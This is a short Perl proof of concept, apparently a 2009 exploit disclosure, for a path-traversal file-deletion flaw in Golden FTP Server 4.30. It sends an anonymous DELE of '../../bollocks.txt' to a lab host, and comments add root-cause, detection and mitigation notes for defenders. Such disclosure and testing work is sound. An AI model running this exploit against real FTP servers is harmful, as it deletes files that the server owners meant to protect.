# Title : Golden FTP Server 4.30 File Deletion Vulnerability
# Published : 2009-12-01
# Author : sharpe
# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]
#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/
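use strict;
use warnings;
use Net::FTP;

# Proof of concept for a path traversal in the DELE handling of Golden FTP
# Server 4.30, as described by the author: a relative path containing "../"
# is resolved outside the configured FTP root, so a logged-in client can
# delete a file that the FTP root was meant to keep out of reach.
#
# Notes for defenders:
#   - Root cause (inferred from the behaviour shown here): the server does not
#     canonicalise the DELE argument and confirm that the result is still
#     inside the FTP root before acting on it.
#   - Detection: review the FTP server log for DELE (and other file commands)
#     whose argument contains ".." sequences.
#   - Mitigation: do not grant delete permission to anonymous accounts, run
#     the service under an account with no rights outside the shared
#     directory, and limit which hosts can reach the service.

# 192.168.1.35 is the author's lab host (Windows XP SP3 per the header).
# Debug => 1 echoes the FTP dialogue, which shows the server's reply to DELE.
my $ftp = Net::FTP->new('192.168.1.35', Debug => 1)
    or die "connect failed: $@";

$ftp->login('anonymous', 'anonymous@local.host')
    or die 'login failed: ', $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
# (path separators reconstructed; the page extraction dropped the backslashes).
$ftp->cwd('/public/')
    or die 'cwd failed: ', $ftp->message;

# Per the author this deletes the file C:\bollocks.txt, which lies outside the
# FTP root. The original ignored the return value; reporting it makes the
# script usable as a before/after check when validating a fix.
if ($ftp->delete('../../bollocks.txt')) {
    print "DELE accepted: the path was resolved outside the FTP root\n";
}
else {
    print 'DELE refused: ', $ftp->message;
}

$ftp->quit;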